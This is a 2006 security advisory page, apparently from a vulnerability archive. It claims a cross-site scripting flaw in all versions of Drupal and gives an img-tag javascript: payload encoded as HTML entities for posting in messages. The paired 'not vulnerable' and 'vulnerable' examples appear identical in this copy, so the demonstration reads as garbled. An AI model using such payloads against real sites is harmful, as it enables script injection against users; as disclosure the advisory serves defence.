Computer Security

Security Advisory: drupal all versiyon xss
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, JSP, CGI, Perl)

  [eVuln] Chimera Web Portal System Multiple Vulnerabilities

  [eVuln] Chipmunk Guestbook XSS Vulnerability

  [eVuln] PHPjournaler SQL Injection Vulnerability

  [KAPDA::#19] - Html Injection in vBulletin 3.5.2

From::) :) <liz0_(at)_bsdmail.com>
Date:03.01.2006
Subject:drupal all versiyon xss

Drupal all versiyon xss
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
---

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')>  = <img src=javascript:alert('XSS')>

---------------------------------------------------------------------------------
------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')>  = <img src=javascript:alert('XSS')>



---------------------------------------------------------------------------------
------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')>
Vulnerable

post mesage  :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')>
Vulnerable  

 
---------------------------------------------------------

Credit:Liz0ziM
mail:liz0@bsdmail.com
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,
cyberlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------



http://liz0zim.no-ip.org/drupal.txt




--
_______________________________________________
Get your free email from http://mymail.bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru